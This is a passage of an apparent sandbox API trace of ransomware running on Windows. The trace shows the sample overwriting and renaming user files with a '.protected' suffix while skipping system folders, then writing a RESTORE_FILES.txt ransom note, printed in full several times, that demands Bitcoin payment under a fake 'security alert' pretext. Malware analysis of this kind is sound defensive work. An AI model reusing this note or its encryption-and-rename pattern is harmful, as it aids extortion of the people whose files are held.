lpSrch=".txt") returned 0x0 [0078.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.186] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".rar") returned 0x0 [0078.186] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest") returned 161 [0078.187] StrStrW (lpFirst="goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", lpSrch=".zip") returned 0x0 [0078.187] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.190] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.190] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.190] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.191] CloseHandle (hObject=0x158) returned 1 [0078.191] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.protected") returned 171 [0078.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest.protected")) returned 1 [0078.192] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.192] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.192] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\RESTORE_FILES.txt") returned 110 [0078.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\manifests\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.192] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.192] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.193] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.193] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.193] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.193] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.193] CloseHandle (hObject=0x154) returned 1 [0078.193] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0078.194] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0078.194] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RESTORE_FILES.txt") returned 100 [0078.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0078.194] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.194] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0078.195] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.195] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0078.195] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.195] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0078.195] CloseHandle (hObject=0x150) returned 1 [0078.196] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0078.196] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0078.196] wnsprintfW (in: pszDest=0x515c98, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\RESTORE_FILES.txt") returned 87 [0078.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0078.196] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.196] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0078.197] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.197] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.197] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.197] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0078.197] CloseHandle (hObject=0x14c) returned 1 [0078.198] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0078.198] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0078.198] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\RESTORE_FILES.txt") returned 74 [0078.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0078.198] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.198] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0078.199] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.199] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0078.199] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.199] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0078.199] CloseHandle (hObject=0xd8) returned 1 [0078.199] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0078.199] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0078.200] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\RESTORE_FILES.txt") returned 70 [0078.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0078.200] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.200] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0078.201] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.201] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0078.201] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.201] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0078.201] CloseHandle (hObject=0xd4) returned 1 [0078.201] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="Windows") returned -1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="Program Files") returned -1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="Program Files (x86)") returned -1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="$Recycle.bin") returned 1 [0078.201] lstrcmpiW (lpString1="Deployment", lpString2="System Volume Information") returned -1 [0078.201] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment") returned 58 [0078.201] lstrcmpW (lpString1="Deployment", lpString2=".") returned 1 [0078.201] lstrcmpW (lpString1="Deployment", lpString2="..") returned 1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*") returned 60 [0078.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0078.202] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.202] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.202] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.202] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.202] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.202] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Deployment\\.") returned 60 [0078.202] lstrcmpW (lpString1=".", lpString2=".") returned 0 